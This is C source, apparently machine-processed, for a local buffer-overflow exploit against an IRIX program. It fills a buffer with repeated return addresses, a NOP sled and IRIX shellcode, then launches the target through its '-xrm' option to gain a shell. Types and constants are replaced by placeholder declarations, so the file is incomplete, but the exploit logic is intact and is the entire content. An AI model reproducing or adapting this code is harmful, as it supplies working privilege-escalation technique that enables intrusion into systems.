
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int u_long ;


 int BUF_LENGTH ;
 int EXTRA ;
 int GP_OFFSET ;
 int IRIX_NOP ;
 int NUM_ADDRESSES ;
 int OFFSET ;
 int PATH_PROG ;
 int PROG ;
 int atoi (char*) ;
 int * buf ;
 int execle (int ,int ,char*,int *,int ,char**) ;
 int exit (int) ;
 int get_sp_code ;
 int * irix_shellcode ;
 int perror (char*) ;
 int printf (char*,...) ;
 int strlen (char*) ;

void main(int argc, char **argv) {
    char *env[] = {((void*)0)};
    u_long targ_addr, stack, tmp;
    u_long *long_p;
    int i, code_length = strlen((char *)irix_shellcode)+1;
    u_long (*get_sp)(void) = (u_long (*)(void))get_sp_code;

    stack = get_sp();

    if (stack & 0x80000000) {
        printf("Recompile with the '-32' option\n");
        exit(1);
    }

    long_p =(u_long *) buf;
    targ_addr = stack + OFFSET;

    if (argc > 1)
        targ_addr += atoi(argv[1]);


    tmp = (targ_addr + NUM_ADDRESSES + (BUF_LENGTH-code_length)/2) & ~3;

    while ((tmp & 0xff000000) == 0 ||
           (tmp & 0x00ff0000) == 0 ||
           (tmp & 0x0000ff00) == 0 ||
           (tmp & 0x000000ff) == 0)
        tmp += 4;

    for (i = 0; i < NUM_ADDRESSES/(4*sizeof(u_long)); i++) {
        *long_p++ = tmp;
        *long_p++ = tmp;
        *long_p++ = targ_addr;
        *long_p++ = targ_addr;
    }

    for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
        *long_p++ = IRIX_NOP;

    for (i = 0; i < code_length/sizeof(u_long); i++)
        *long_p++ = irix_shellcode[i];

    tmp = (targ_addr + GP_OFFSET + NUM_ADDRESSES/2) & ~3;

    for (i = 0; i < EXTRA / sizeof(u_long); i++)
        *long_p++ = (tmp >> 8) | (tmp << 24);

    *long_p = 0;

    printf("stack = 0x%x, targ_addr = 0x%x\n", stack, targ_addr);

    execle(PATH_PROG, PROG, "-xrm", &buf[2], 0, env);
    perror("execl failed");
}
